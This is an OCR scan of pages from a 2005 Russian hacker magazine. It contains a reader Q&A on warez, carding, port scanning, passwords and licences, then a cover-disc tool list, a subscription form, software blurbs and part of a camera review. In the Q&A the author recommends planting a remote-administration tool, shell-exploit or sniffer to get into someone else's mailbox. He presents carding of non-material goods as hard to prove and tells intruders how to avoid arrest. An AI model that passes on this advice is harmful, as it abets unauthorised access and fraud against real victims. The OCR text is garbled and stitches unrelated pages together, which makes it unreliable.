Пухе с кактусом под 
хвостом". Другие же 
используют порно/ва- 
рез как приманку, и 
при заходе клиента на 
сайт забрасывают на 
его компьютер зло- 
вредный код. Это дело 
поставлено на широ- 
кий поток, сюда вкла- 
дываются реальные 
деньги и привлекаются 
профессиональные 
программисты, которые 
оперативно разрабаты- 
вают свежие "мохна- 
тости", часто опережая 
выход заплаток, поэто- 
му своевременные об- 
новления уже не помо- 
гут. Чаще всего объек- 
том атаки служит брау- 
3ep (как правило, IE, 
Лис или Орега). Так что 
ставь себе что-то сов- 
сем необычное (напри- 
мер links) и не парься. 


Конечно, нет! Links 
спасает только от атак 
на сам браузер. Порно 
в нем можно смотреть 
безбоязненно, но с ва- 
резом будет сплошной 
напряг. Лучше качать 
его с официальных 
сайтов, а в "дикой" Се- 
ти искать серийные но- 
мера или ключи регист- 
рации. Генераторы ре- 
гистрационных номе- 
ров, будучи исполняе- 
мыми файлами, несут в 
себе большую опас- 
ность, поэтому лучше 
всего запускать их на 
виртуальной машине 
(VMWare, Virtual PC) 
или He запускать вооб- 
ще. К сожалению, не 
все программное обес- 
печение можно скачать 
с официальных сайтов, 
поэтому качай взло- 
манные версии с нес- 
кольких независимых 
источников и сравни их 
утилитой fc из штатно- 
го комплекта поставки 
Windows или любой 
другой. Инфицирован- 
ные версии распозна- 


ются сразу же. А дове- 
рять антивирусам кате- 
горически не реко- 
мендую. 


Вот три основных ис- 
точника: сдфайлообмен- 
ные сети, IRC и приват- 
ные ftp-cepBepa. Среди 
файлообменных сетей 
лидируют Осел (eMule), 
Shareaza и BitTorrent. 
В Осле много секрет- 
ной документации, му- 
зыки и софта. Через 
BitTorrent в основном 
передают видеофиль- 
мы. Shareaza пока что 
находится в стадии 
роста. Ну а порно есть 
везде :). Чтобы пользо- 
ваться файлообменны- 
ми сетями, желательно 
иметь постоянное подк- 
лючение, поскольку 
скорость скачки остав- 
ляет желать лучшего и 
приходится долго прос- 
таивать в очередях. 
Иногда передача cpan- 
ла (неважно какого 
объема) занимает до 
двух-трех месяцев! IRC - 
это разновидность ча- 
та, но, в отличие от 
web-yarTos, на IRC мож- 
но вешать специаль- 
ные скрипты, отдаю- 
щие файлы по запро- 
су. Многие 1РС'шники 
так и поступают. На IRC 
вывешивают преиму- 
щественно свежий 
сост, поэтому возмож- 
ности поиска здесь 
очень ограничены. На 
том же самом IRC и 
разных меб-форумах 
(например ru- 
board.com) частенько 
пробегают ссылки на 
стихийно поднятые ftp- 
серверы, которые че- 
рез некоторого время 


бесследно исчезают, 
успевая раздать кучу 
вареза. 


Чем сложнее приложе- 
ние, тем выше вероят- 
ность присутствия 
ошибок в его коде. 
Браузеры - это очень 
сложные приложения. 
Фактически это опера- 
ционные системы в ми- 
ниатюре, и ошибок не 
избежал ни один из 
них ("кастрированные" 
браузеры типа links'a 
не в счет). Также очень 
опасен Осел, посколь- 
ку он "засвечивает" 
твой IP и, если на 
компьютере не уста- 
новлены заплатки, мо- 
жет быть легко атако- 
ван. Через файлооб- 
менные сети черви 
очень быстро распро- 
страняются... 


Является, однозначно. 
При покупке "железа" 
или иных материаль- 
ных товаров ты серьез- 
но рискуешь, и преце- 
денты арестов таких 
кардеров уже есть. 
Срок обычно дают ус- 
ловно, однако перед 
этим будет суд плюс 
конфискация компью- 
тера, что не есть хоро- 
шо. Даже если его от- 
дадут обратно, то толь- 
ко в "изнасилованном" 
состоянии, после чего 
он станет как Hepog- 
ной. Плюс пятно на 
твоей репутации, проб- 
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лемы с трудоустрой- 
ством и весь прочий 
мясокомбинат. С нема- 


териальными услугами 
(порно, медиа, e-books) 
все обстоит иначе. До- 
казать факт соверше- 
ния покупки практичес- 
ки невозможно, пос- 
кольку никакие бумаж- 
ные документы He фи- 
гурируют и всегда мож- 
но сослаться, что это 
кто-то влез в компью- 
тер и чего-то там нахи- 
мичил. Только не надо 
воспринимать это как 
призыв к действию! 
Последствия могут 
быть весьма печальны- 
ми. Например, на одном 
порносайте за кардер- 
ство обещали высы- 
лать кастрационную 
команду быстрого реа- 
гирования. 


С юридической точки 
зрения понятия "скани- 
рование" просто нет. 
Уголовный кодекс опе- 
рирует такими понятия- 
ми, как несанкциониро- 
ванный доступ к охра- 
няемой информации, 
нарушение работоспо- 
собности вычислитель- 
ной машины, искаже- 
ние и уничтожение 
данных и T.g. Если ска- 
нирование не уронило 
сервер, то ничего кри- 
минального с точки 
зрения УК не произош- 
ло. А как же несанкци- 
онированный доступ к 
данным? Да не было 
никакого несанкциони- 
рованного доступа! 
Сканирование выявля- 
ет перечень услуг, ле- 
гально предоставлен- 
ных сервером, это что- 
то наподобие чтения 
табличек "открыто" 
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или "закрыто", выве- 
шенных на дверях. Тем 
не менее, сканирова- 
ние портов обычно яв- 
ляется первой фазой 
хакерской атаки. Так 
сказать, своеобразным 
сигналом к вторжению, 
поэтому его боятся и 
при первой же возмож- 
ности пресекают. До 
суда дело еще ни разу 
не доходило (состава 
преступления нет), но 
обиженная сторона 
очень даже может на- 
жаловаться провайде- 
ру. В худшем случае 
последует отключение 
от Сети, но обычно все 
дело сводится к "выго- 
вору" по телефону. 
Правда, отмечены не- 
однократные случаи 
физических разборок с 
тяжелыми телесными 
повреждениями. 


Будем надеяться, что 
это действительно твой 
пароль :), а не пароль 
твоей подружки или 
партнера по бизнесу 
(как бывает чаще все- 
го). Значит так. Чтобы 
добыть пароль с серве- 
ра, необходимо хакнуть 
его целиком. Теорети- 
чески это возможно, но 
практически трудно- 
реализуемо и к тому 
же наказуемо, поэтому 
приходится идти дру- 
гим путем. Как прави- 
ло, на многих серверах 
есть служба забытых 
паролей, требующая 
ответить на такой-то 
вопрос. Часто ответ 
тривиален или может 
быть угадан с несколь- 
ких попыток. Если же 
это все-таки не твой 
ящик, можно забросить 
на компьютер жертвы 
любую из систем уда- 
ленного администриро- 
вания, или, выражаясь 
хакерским языком, отк- 
рыть Ha ней Shell, для 
чего подойдет любой 
shell-exploit. А если 
жертва находится в Og- 
ной локальной сети с 
тобой, можно натра- 
вить на нее снифер. 


Не нагрянут, не бойся. 
С первого раза еще ни- 
кого не повязывали - 


тут нужна доказатель- 
ная база плюс заявле- 
ние от потерпевшего. 
Даже если потерпев- 
ший напишет заявле- 
ние, если будет отсле- 
жен твой маршрут и 
определен твой домаш- 
ний адрес, в квартиру 
никто не вломится. За 
человеком устанавли- 
вают более или менее 
плотную слежку. Если 
лечь на дно и не пред- 
принимать никаких не- 
законных действий (на 
хакерских форумах, 
впрочем, лазить мож- 
но), то никакой угрозы 
нет. Во всяком случае, 
в России дела обстоят 
именно так. На западе 
все сложнее. Да и что с 
него, дикого, возь- 
мешь? Уродами были, 
уродами и остались. 
Только индейцев отге- 
ноцидили. После того 
как ты хакнул нечто 
очень крутое, в Амери- 
ку можно будет въе- 
хать только чучелом 
или тушкой :). Аресто- 
вать могут прямо в 
аэропорту и без npeg- 
упреждений. 


Такой системы нет. Во 
всех ныне существую- 
щих осях обнаружива- 
ются дыры. Чем попу- 
лярнее операционная 
система, тем интенсив- 
нее ее ковыряют и, со- 
ответственно, наобо- 
рот. До недавнего вре- 
мени считалось, что в 
Ипих дыр нет, но на са- 
мом деле его просто 
никто не исследовал 


как следует, а теперь 
его дыры сыплются как 
из рога изобилия. На 
FreeBSD дыр намного 
меньше: разработчики 
вылизывают релизы go 
зеркального блеска, 
предпочитая семь раз 
подумать и один раз 
накодить. Поэтому 
FreeBSD очень медлен- 
но развивается и неиз- 
бежно отстает от прог- 
ресса. ОМХ, которая, 
как известно, работает 
в атомных реакторах и 
реактивных истребите- 
лях, никаких дыр, похо- 
же, вообще не содер- 
жит, но и софта под 
нее выпущено очень 
немного (да и тот боль- 
шей частью ориентиро- 
ван на разработчиков). 
В мире Windows самой 
непрошибаемой оказа- 
лась... Windows 98. Ли- 
нейка МТ (2000, XP и 
т.д.) - просто скопище 
багов, поэтому, если 
есть такая возмож- 
ность, от ее использо- 
вания лучше отказать- 
ся. Лично я сижу под 
М/2К, но постепенно пе- 
рехожу Ha Debian :). 


Почему-то многие счи- 
тают, что лицензия eg- 
ва ли не равноценна 
Уголовному кодексу, и 
все, что там ни написа- 
но, следует в обяза- 
тельном порядке со- 
блюдать, иначе придет- 
ся коротать длинные 
зимние ночи под небом 
в клетку вместе с 
друзьями в полоску. 
Бред! Чушь собачья! 
Лицензия - это договор 
и не более того! Не сто- 
ить строить насчет нее 
никаких иллюзий, при- 
писывая ей несущест- 
вующее могущество. 
Скажем, срывать плом- 
бы на телевизоре тоже 
по идее нельзя (во вся- 
ком случае, так написа- 
но в паспорте к телеви- 
зору). Но если рискнул 
сделать это, наивно 
ожидать нашествия 
ОМОНА и длительного 
тюремного заключе- 
ния :). Срыв пломб по- 


влечет за собой всего 
лишь нарушение дого- 
вора, заключенного 
между продавцом и по- 
купателем, с последую- 
щей потерей всех га- 
рантий и обязательств, 
данных продавцом. Си- 
туация с программным 
обеспечением в точ- 
ности аналогична. При 
заключении сделки ты, 
покупатель, со своей 
стороны обязуешься 
выполнять все пункты 
лицензионного согла- 
шения. А разработчик, 
то есть продавец, обе- 
щает тебе всяческую 
помощь (техническую 
поддержку, скидку на 
все новые версии и так 
далее). Если ты нару- 
шишь лицензию, един- 
ственное, что сможет 
предпринять против те- 
бя продавец, - отказать 
в технической подде- 
ржке, отменить скидки 


на новые версии, то 
есть забрать обратно 
все свои обязатель- 
ства. Но ничего сверх 
этого! Однако если кро- 
ме лицензии нарушить 
авторское или патент- 
ное право, тут же всту- 
пят в силу совсем дру- 
гие законы. Например, 
сорвав пломбы с теле- 
визора, ты еще не со- 
вершаешь никакого 
преступления. Но когда 
изучишь его монтаж- 
ную схему, изготовишь 
точно такой же агрегат 
и вынесешь его на ры- 


нок для продажи, про- 
изводитель сможет по- 
дать в суд за наруше- 
ние патентного права, 
вчинив иск ТОГО ИЛИ 
иного размера. Анало- 
гия с программным 
обеспечением очевид- 
на. В то же время никто 
не запрещает ковы- 
ряться и вносить 
конструктивные изме- 
нения в свой экземп- 
ляр телевизора "для 
домашнего пользова- 
ния" (по аналогии - 
адаптировать програм- 
мы). Что можно вытво- 
рять с программным 
обеспечением, буду пе- 
речислять очень долго. 
Лучше расскажу, что 
нельзя делать с ним. 
Нельзя копировать его 
(не путать с "распрост- 
ранять"), нельзя выда- 
вать за свое собствен- 
ное, наконец, его нель- 
зя кушать :). 


Мне часто приходится 
видеть людей, впадаю- 
щих в другую край- 
ность и начинающих 


утверждать, что все 
электронные лицензии 
не имеют никакой си- 
лы, поскольку не снаб- 
жены ничьей под- 
писью. На худой конец, 
можно попробовать 
прикинуться наивным 
чукотским юношей, не 
умеющим читать. А раз 
человек не читал, то 
какой с него спрос? Ут- 
верждение "незнание 
закона не освобождает 
от ответственности" 
здесь неприемлемо, так 
как речь идет не о за- 
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коне, а о договоре, нез- 
нание которого осво- 
бождает ото всех обя- 
зательств, данных по 
нему: как гласит статья 
432 Гражданского ко- 
декса РФ, если одна из 
сторон не сумела или 
не захотела прочитать 
договор, то он призна- 
ется недействитель- 
ным. На самом деле по- 
нятие договора столь 
широко, что выходит 
за рамки бумаг и папи- 
русных свитков. Так, 
опуская жетон (карточ- 
ку) в турникет в метро, 
с юридической точки 
зрения ты заключаешь 
договор (деньги в об- 
мен на услугу доставки 
тела в нужное место и 
нужное время). Нигде 
нет ничьей подписи, но 
это еще не означает, 
что если автомат бла- 


гополучно проглотил 
жетон, а тебя все рав- 
но не пропустил, это 


сойдет ему с рук ввиду 
отсутствия на договоре 
подписи, заверенной 
печатью. Такая же си- 
туация складывается и 
с программным обеспе- 
чением. Электронный 
договор не является 
препятствием для вы- 
несения иска лицу, на- 
рушавшему его. Техни- 
ка сбора необходимых 
доказательств - совсем 
другой вопрос, но не 
стоит надеяться, что у 
истца всегда отсутству- 
ют такие доказатель- 
ства. Короче говоря, в 
жизни действует такая 
схема: если люди про- 
сят за свой продукт 
нормальные деньги, 
его покупают, в против- 
ном случае - пионерят, 
и пусть силы правопо- 
рядка попробуют что- 
то доказать. Это не 
призыв, а констатация 
факта. 


(дате) Гапа! 
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Заработок/процессинг: что и как реализовать. Как 
сделать свою пирамиду/банк, как кидают в е-бизнесе. 


Все о жучках. Компьютерный шпионаж. Тайна PGP: есть 
ли в нем "троян". Реализация слежки и противостоя- 


Шпионские хитрости. "Большой брат следит за тобой". ‚ г 
ние ей. Е 


EEREREREBREREBEEEES 
то-то удаленно воспользовался 
К уязвимостью в твоем ПО? Не помог 
firewall? Возвести настоящую "ог- 
ненную стену" тебе поможет софт с диска - 
становись настоящим секьюрити-гуру, узнай 
о безопасности клиентских приложений все! 


КА 


СНОВА 


HAY В 1992 


НА ДИСКЕ: 


Extraz: 
Norton Antivirus 2005 @ 
Rainbow Crack 1.2 (src/scripts) @ 
Nessus 2.2.5 @ 
„.и еще сотни Мб @ 

полезного софта! 


+ ко всему: 
Ватаку! @ 
Роем окопы @ 
Инструменты ® 


Лучший софт от М№оМаМе ® 


‘Обновления Windows (9x/XP/NT/2000/2003) @ 
Спец 07(56), Мобильные деньги ® 
Июльские номера: Хакер, Железо, МС ® 


весь софт из номера! 


В АТАКУ! 
и Atelier Web Firewall Tester 
mw CRACKL@B Protected 
Storage Viewer 1.0 (+src) 

и DNSTest 1.0 

и FireHole 1.01 

w Ghost 1.1 

gw LeakTest 1.2 

и mbtest 0.2 

mw Nessus 2.2.5 

и Nmap 3.81 

и Outbound 

и pcAudit 3.0.0.9 

и pcAudit Leak Test 

и Rainbow Crack 1.2 
(src/scripts) 

и Shadow Security Scanner 
7.61 

w Showtraf 1.5.0 

w Surfer 1.1 

a Thermite 

mw TooLeaky 

a Wallbreaker 4.0 

ш winsock sniffer 1.76 

mw YALTA 


\ 


Wp, 
5.2 


YY: 
ALLS 


POEM ОКОПЫ 
и АНСК 2.8-1 
и Зргоху 1.5 
и bstring-05302005 

и DrWeb 4.326 (win/linux) 
и Ethereal 0.10.12 (win/src) 
и fwmon v1.1.0 

и Kaspersky Anti-Hacker 1.7 
и Kaspersky Anti-Virus 
Personal Pro 5.0 

и Kaspersky Personal 
Security Suite 1.0 

ш Netstatp v2.0 

и NetTime 2b7 (+src) 

и Norton Antivirus 2005 

и Norton Internet Security 
2005 

и pcinternet Patrol 

и Proxomitron 4.5 

и RKDetect (by Offtopic) 

и Safe Run As 


gw SpyBot Search&Destroy 1.4 


и Symantec AntiVirus for 
Handhelds 


и Symantec AntiVirus for 
Series60/80 

и TCPView v2.40 

и WinPcap 3.0/3.1beta4 


ИНСТРУМЕНТЫ 

и MINGW 4.1.1 

ши putty 0.58 (+src +sftp-GUI) 
и SecureCRT 5.0 


СОФТ OT NONAME 
и AutoPatcher XP Jul2005 
и AWicons 9.2.0 

и CrackDownloader 2.2 
DrWeb Browser plugin 
FeedReader 2.9.0 
NetView 2.92 

NINJAM 0.06 

и Saver 1.2 

и TaskSwitch ХР 2.0.6 
и TrueCrypt 3.1.а 

и WAPT 3.0 


Все это Ha 
МУЛЬТИЗАГРУЗОЧНОМ CD! 


Бесплатный телефон по всем 
вопросам подписки для регионов: 


(в том числе для абонентов МТС, 
Билайн, МегаФон), для Москвы: 


СЕРВИС 


Заказ удобно оплатить через любое отделение банка 
Доставка осуществляется заказной бандеролью или курьером 


на один месяц (экономия 40 рублей*) 
на 6 месяцев (экономия 240 рублей*) 
на 12 месяцев (экономия рублей*) 


комплект на один месяц 
(экономия 85 рублей*) 


комплект на 6 месяцев 
(экономия 510 рублей*) 


комплект на 12 месяцев 
(экономия рублей*) 


*от средней розничной цены по Москве 
*+*Хакер с 2CD или Хакер с DVD 


ЗАКАЖИ ЖУРНАЛ В РЕДАКЦИИ И СЭКОНОМЬ ДЕНЬГИ: 


ПОДПИСНОЙ КУПОН 


ИНН 7729410015 ООО «Гейм Лэнд» 


Извещение 
Прошу оформить подписку: ЗАО — Международный Московский Банк, г.Москва 
[_] нажурнал Хакер Спец 
р/с № 40702810700010298407 
[_] на комплект Хакер Спец и Хакер с DVD к/с № 30101810300000000545 
[_] на комплект Хакер Спец и Хакер с 2CD БИК 044525545 КПП - 772901001 
ha [| ЕВ Плательщик 
начиная с 2005 r. Адрес (с индексом) 
о Доставлять журнал по почте 
на домашний адрес Назначение платежа Сумма 
oO Доставлять журнал курьером Ha Оплата за « » 
адрес офиса (по г. Москве) i 6 2005г 
Подробнее о курьерской доставке читайте ниже И 
. isis Ф.И.О. 
(отметьте квадрат выбранного варианта подписки) Кассир 


Подпись плательщика 


Ф.И.О. 


ИНН 7729410015 ООО «Гейм Лэн 
дата рожд. Ш [} | []} LI LI г. Квитанция : ee 
ai aca ЗАО — Международный Московский Банк, г Москва 
АДРЕС ДОСТАВКИ: 
р/с № 40702810700010298407 
индекс 
В к/с № 30101810300000000545 
областыкрай 
БИК 044525545 КПП - 772901001 
город, 
Плательщик 
улица 
Адрес (с индексом) 
дом корпус 
квартира/офис 
АЕ Назначение платежа Сумма 
телефон { код ) Оплата за « » 
e-mail с 2005 г. 
сумма оплаты ФИО. м 
к M 
к Подпись плательщика 


укажите адрес и название фирмы в подписном купоне. м 


1. Заполнить купон и квитанцию 

2. Перечислить стоимость подписки через Сбербанк 

3. Обязательно прислать в редакцию копию оплаченной квитанции с четко заполненным купоном любым 
из перечисленных способов: 

© по электронной почте: subscribe@glc.ru; 

© по факсу: 924-96-94; 

© по адресу: 119021, г. Москва, ул. Тимура Фрунзе, д.1, стр. 44-45, 000 «Гейм Лэнд», отдел подписки. 


ВНИМАНИЕ! 

Подписка оформляется в день обработки купона и квитанции. 

© купоны, отправленные по факсу или электронной почте, обрабатываются в течение 5 рабочих дней. 
© купоны, отправленные почтой на адрес редакции обрабатываются в течение 20 дней. 


Рекомендуем использовать электронную почту или факс. 


Подписка производится с номера, выходящего через один календарный месяц после оплаты. Например, если произвести оплату в 
сентябре, то подписку можено оформить с ноября. 


По всем вопросам по подписке звони бесплатно по телефону 8-800-200-3-999 (для регионов, в том 
числе с мобильных телефонов МТС, Билайн, Мегафон) или 935-70-34 (из Москвы), 
Вопросы по подписке можно задавать по e-mail: info@glc.ru 


Подписка для юридических лиц 


х 
= 
= 
о 
- 
6 
6 
о 


СОФТ, 
ОТ МОМА 


NINJAM 0.06 


Интересная разработка от создателя WinAmp'a - 
Джастина Френкеля. Эта программа предназначена 
для музыкантов и является своего рода музыкаль- 
ным аналогом [Р-телесронии :). 
Отличительной особенностью является способ борьбы с 
задержками. Едва ли программа приобретет тот же успех, 
что и WinAmp, но поиграться можно. 


ча гу = аа т 
a = = 
- С - ma 
re = - — — a 
— == a - 
ail -— — 
и а м a P = 
aii oh — 
- ae = 
= = 
AWICONS 9.2.0 


AWicons - инструмент для поиска, создания, pegak- 
[>> тирования, импортирования/экспортирования ико- 

нок, статических и анимированных курсоров, не- 
больших изображений. 
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Поддерживает кучу форматов, умеет работать с библиоте- 
ками иконок, менять иконки в исполняемых срайлах, сни- 
мать скрины с экрана и многое другое. А что самое прият- 
ное, Standart-Bepcua бесплатна для жителей территории 
бывшего СССР :). 


TASKSWITCHXP PRO 2.0.6 


TaskSwitchXP - программа для переключения задач 

в ОС Windows ХР/2003, альтернатива стандартному 

невзрачному окошку Windows, которое появляется 
по <Alt>+<Tab> (или <Alt>+<Shift>+<Tab>). 


iwi от 


TaskSwitchXP использует визуальные стили (Visual Styles) 
оформления Windows ХР/2003 ("Свойства экрана"-> 
"Оформление"-> "Стиль Windows ХР") и предоставляет 
возможность предпросмотра выбранного окна. 


МАРТ 3.0 


WAPT - программа для испытания web-cepBepa nog 
нагрузкой. Позволяет проверить устойчивость тво- 
его меБ-приложения к реальным нагрузкам. 


WAPT может моделировать множественных пользовате- 
лей для каждого сценария, изменять задержки между зап- 
росами и динамически генерировать испытательные пара- 
метры. Значения параметров запроса и URI могут быть 
рассчитаны несколькими способами и даже, вероятно, бу- 
дут определены ответом сервера на предыдущий запрос. 


NIKSAVER V 1.2.5 PANDA PT INTERNET SECURITY 2005 > 
Часто бывает, что Windows слетает по каким-то сво- Новый пакет от небезызвестной Panda. На этот раз = 
By им заморочкам или просто потому, что ты забыва- By не просто антивирус - это пакет ПО для комплекс- 
ешь об активации :). В таких случаях я привык ной защиты твоего ПК. Е 
пользоваться Drive Image. Сделал полный image харда, ес- Имеет в себе не только банальные антивирус, файрвол и 
т.п., HO еще 
и спам- о 
фильтр, не- 
кую систе- - 
му защиты 
от мошен- 6 
ничества в 
Сети, сете- 8 
вой фильтр 
и кучу gpy- о 
гих серви- 
сов. 
ли что - восстановил, и все в шоколаде. Но вдруг попалась NETVIEW V2.92 
Ha глаза другая утилитка... 
Программа позволяет как бы "резервировать" части ре- Очень полезная софтинка для администрирования 
естра и системных сайлов, чтобы потом можно было легко локальных сетей. Это не просто мощный 
восстановить информацию. Соответственно, и она сама, и инструмент для мониторинга сетей. 


ее бекапы намного легче Drive Image, хотя в наши времена 
200-гиговых хардов уже мало кто обращает внимание на 
место :). 


CRACK DOWNLOADER 2.2 


CrackDownloader - это простое решение для поиска 
"лекарств" на просторах Сети. 


НЫ Гаев ам fF a) 
= Неа 


в @H- 8S © & @ 


NetView может дополняться плагинами, а также умеет 


= =| See © - представлять локальную сеть визуально :), то есть 
[Е] вв =) ыы = [еее | рисовать ее. В Uplink все играли :)? 
=e № — = + 
. EE eee 
A ha ee | His мер aie 


$ Нью маша ВВ || а Шещвар 


TRUECRYPT 3.1A 


- Хорошая и бесплатная альтернатива программе 
Zeist commas Ра BEST CRYPT. 


es 


1 Secce Seefiace 1 


Ss es ел 


a aay eee OF POO Позволяет создавать зашифрованные виртуальные дис- 
] 1 ee | ss eee | ai a] з 
5 ы ки, которые затем могут использоваться как обычные ло- 
ав; гические дис- 
2 Гоеваный | мария | er 
= oS р ки системы. 
авы _ — =, 
ы = = — | -——— fon Доступные 
= mao. — i = о 
=! as алгоритмы 
fae Роны i or’ — = 
ts та шифрова- 
= Hua: AES, 
a — = = : 
a | = Blowfish, 
Теперь He нужно каждый раз лазить Ha Astalavista: просто = Ш CASTS, 
1 
введи название программы, и сосфтина найдет для тебя Serpent, 
—— —— ae! = 
все, что нужно :). Внимание! Программа предоставляется — =a = Triple DES, 
только для ознакомительных целей :)! [т — = — | АН 
— ь 
= — —S ы 


Фотики для... 
Небо! Море! Отдых! 


Быть первым 
MSI МХ 7800СТХ 


Паяльник 


Таймер с "волшебной" лампочкой 


HARD | ФОТИки ДЛЯ. ) 


Алексей Шуваев, test_lab (test_lab@gameland.ru) 


ФОТИКИ 
ДЛЯ... 


НЕБО! МОРЕ! ОТДЫХ! 


О втором мы сейчас и поговорим. 


K аждый из нас, отправляясь на отдых, будь то загородная поездка или 
путешествие в экзотические страны, задумывается над тем, как сохранить 
увиденное. Тут же в голову приходит мысль о видеокамере или фотоаппарате. 


A 


ВСТУПЛЕНИЕ 

Наступает бархатный се- 
зон и время отпусков для тех, 
кто переждал самую жаркую 
пору сидя в офисе или дома 
со включенным кондиционером. Собираясь в 
дорогу, ты непременно наберешь хорошей 
музыки, чтобы не скучать в дороге, множест- 
во вещей, из которых наденешь только га- 
вайку и шорты, и, конечно же, дфотоаппарат - 
непременно цифровой. Покатавшись этим ле- 
том, я обратил внимание на то, что, несмотря 
на большую любовь к качественным сним- 
кам, большинство берут в дорогу небольшие 
фотоаппараты, дабы не занимать драгоцен- 
ное место и не стеснять движений. Просресси- 
ональные цифровые камеры с тремя объек- 
тивами, штативами, горкой аккумуляторов и 
стопкой flash'ek мы оставим сранатам своего 
дела, а сами снарядимся попроще. 

Для теста выбраны сфотоаппараты с верх- 
ним пределом цены в 400 единиц по амери- 
канской денежной системе. Эти сротоаппара- 
ты отличаются от простых "мыльниц" тем, 
что имеют оптический зум, ручные настройки 
выдержки и диафрагмы и небольшие габа- 
риты - эдакая смесь автоматики с возмож- 
ностью поколдовать над кадром при жела- 
нии. Сразу отметим, что не стоит ждать от та- 
ких фотоаппаратов картинки, которую мож- 
но поместить Ha билл-борд, но фотография, 
сделанная тобой, украсит любой сротоаль- 
бом. Я дам несколько советов, которые об- 
легчат путешествие. 

Докупи к фотоаппарату На$В-карту объе- 
MOM не менее 1 Гб и не удаляй фотограсрии с 
сротоаппарата: ЖК-дисплей достаточно ма- 
ленький, и существует вероятность удалить 
четкие кадры, оставив размытые. Обяза- 
тельно купи мягкий и влагонепроницаемый 
(!) чехол: он убережет камеру от дождя и 
спасет ее от механических повреждений. 
Неплохо взять чехол чуть больше необхо- 
димого, дабы туда поместились документы 
или телефон во время дождя, если будет 
негде спрятаться. Если после покупки всего 
необходимого к отпуску на море у тебя оста- 


лось немного денег, советую подумать о 


приобретении бокса для подводной съемки. 
Хотя цена таких гаджетов порой сравнима с 
ценой сротоаппарата, но удовольствие от 
снимков, сделанных под водой, с лихвой 
окупит затраты. 


ХАКЕРСПЕЦ | 09(58) | 2005 


СПИСОК УСТРОЙ 


—_ = 
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Olympus 
Camedia C-55 


Casio 
Exilim ЕХ-757 


FUJIFILM 
FinePix F455 


Konica Minolta 


E50 
gry al 
в. —, Nikon 
Ты и | Coolpix 5900 
| FujiFilm 
FinePix [10 


Pentax optio 
S5n 


Olympus [mju:] 
DIGITAL 500 


SAMSUNG 
Digimax V700 


НА ЧТО СТОИТ 
ОБРАТИТЬ ВНИМАНИЕ 
Все протестированные 
камеры обладают возмож- 
ностью ручной настройки 
параметров съемки. Чем 
больше таких настроек, тем 
интереснее будет снимать 
спустя какое-то время. Так- 
же обрати внимание на ис- 
точник питания: если это 
съемная Ч-оп-батарея, она 
снижает общий вес камеры, 
но есть шанс остаться без 
снимков, если ты собира- 
ешься пройтись по диким и 
не затронутым цивилизаци- 
ей местам. Обычные бата- 
рейки АА в качестве эле- 
ментов питания увеличива- 
ют вес фотоаппарата, но их 
можно приобрести на каж- 
дом углу, а при необходи- 
мости запастись парой упа- 
ковок. Что выбрать, решать 
тебе, но я предпочитаю 
всегда быть в полной готов- 
ности. Выбирая фотоаппа- 
рат, обрати внимание не 
только на технические ха- 
рактеристики, но и на эрго- 
номику: от нее зависит, бу- 


Камера Olympus 
Camedia C-55 Ha рын- 
ке известна так же, как C- 
5500 Sport Zoom. Olympus 
Camedia получила именно 
это имя неспроста: несмотря 
на малые габариты объекти- 
ва, он обладает 5-кратным 
оптическим увеличением, 
что не свойственно аппара- 
там такого класса. Помимо 
своих оптических свойств, 
объектив обладает хорошей 
скоростью работы и быст- 
рым откликом на управляю- 
щие кнопки. 
Из особенностей внешнего 
вида стоит отметить сход- 
ство с пленочными мыльни- 
цами: отсек для НазВ-карты 
выполнен так, словно под 
ним кроется пленка. Такое 
сходство, скорее, сложилось 
случайно, а не было обеспе- 
чено намеренно. Удобство 
работы с аппаратом на уров- 


OLYMPUS CAMEDIA C-55 


дет ли у тебя уставать рука 
при продолжительной Cb- 
емке и не выронишь ли ты 
фотоаппарат. Попробуй 
сразу сделать несколько 
снимков и просмотри их на 
большом экране - битых 
пикселов быть не должно. 
Попробуй сделать серии 
снимков: скорость записи 
Ha flash'ky зависит не толь- 
ко от микросхемы памяти, 
но и от процессора в фото- 
аппарате. Порой бывает 
нужно иметь глазок видо- 
искателя в дополнение к 
ЖК-экрану, так что обрати 
и на это внимание. Теперь 
перейдем к техническим ха- 
рактеристикам. 


ТТХ 

Покупая фотоаппарат, 
многие смотрят на цифры и 
не вдаются в детали. А ведь 
7-мегапикселный сфотоап- 
парат может выдавать 
снимки более низкого каче- 
ства, чем 5-мегапикселник. 
Обрати внимание на оптику, 
так как обычно в ней кроет- 
ся причина всевозможных 


Технические характеристики: 
Размеры матрицы: 51 Mn, 
2592x1944 

Объектив: 5х оптический + 4х 
цифровой зум 

Носитель: карты xD; 16 Мб в 
комплекте 

ЖК: 2.0" 

Формат: JPEG, TIFF; видео: 
QuickTime Motion JPEG 


(320x240, 30 кадр/с); звук: 
WAV 


Цена: $325 


не: все кнопки расположены 
таким образом, чтобы ис- 
пользовать отведенное для 
съемки время максимально 
эффективно, этому способ- 
ствует и "спортивный зум“. 
В правой части имеется про- 
резиненный выступ, кото- 
рый позволит фиксировать 
камеру одной рукой. При ра- 
боте нам очень понравилась 
быстрая фокусировка на 
объектах. Особого компли- 
мента заслужил макроре- 


искажений. Теперь о крат- 
ности приближения - зум 
или оптический трансфрока- 
тор. Стоит четко разделять 
циоровой и оптический 
зум. Если оптический реа- 
лизуется на основе оптики, 
то цифровой зум - на осно- 
ве электроники. При ис- 
пользовании оптического 
зума важно понимать, что 
качество картинки снижает- 
ся пропорционально крат- 
ности цифрового прибли- 
жения. 

Если твой фотоаппарат 
оснащен микросроном, то, 
естественно, у тебя появит- 
ся возможность делать не- 
большие видеоролики со 
звуком или оставлять голо- 
совые комментарии к CpO- 
тограсиям. 


КАК МЫ 
ТЕСТИРОВАЛИ 

Взяв фотоаппарат в ру- 
ки, первым делом обраща- 
ешь внимание на эргономи- 
ку. Расположение элемен- 
тов управления, легкость 
нажатия на кнопки, доступ- 


жим, который позволяет 
снимать объекты с расстоя- 
ния двух сантиметров - OT- 
личный показатель. 

Что касается съемки, то 
здесь имеются десять пре- 
дустановленных сцен плюс 
возможность настроить 
один режим под себя. Если 
ты предпочитаешь фикси- 
ровать кадры по принципу 
"включил и снял", то MO- 
жешь положиться на авто- 
матику: процессор TruePic 


ность элементов управле- 


ния - вот факторы, которые 
формируют первое впечат- 


ление. Наличие большого 


ЖК-дисплея всегда привет- 


ствуется, потому что гораз- 


go приятнее изучать компо- 


зицию не через глазок BU- 
доискателя, который часто 
искажает геометрию. Хотя 


глазок может быть полезен 


в очень яркую погоду, ког- 
да изображение Ha LCD 
просто меркнет. Русифика- 
ция и легкость навигации 
по меню также оценива- 
лись. Предустановленные 
режимы съемки и возмож- 
ности ручной настройки 


многих параметров испыты- 


вались тщательным обра- 
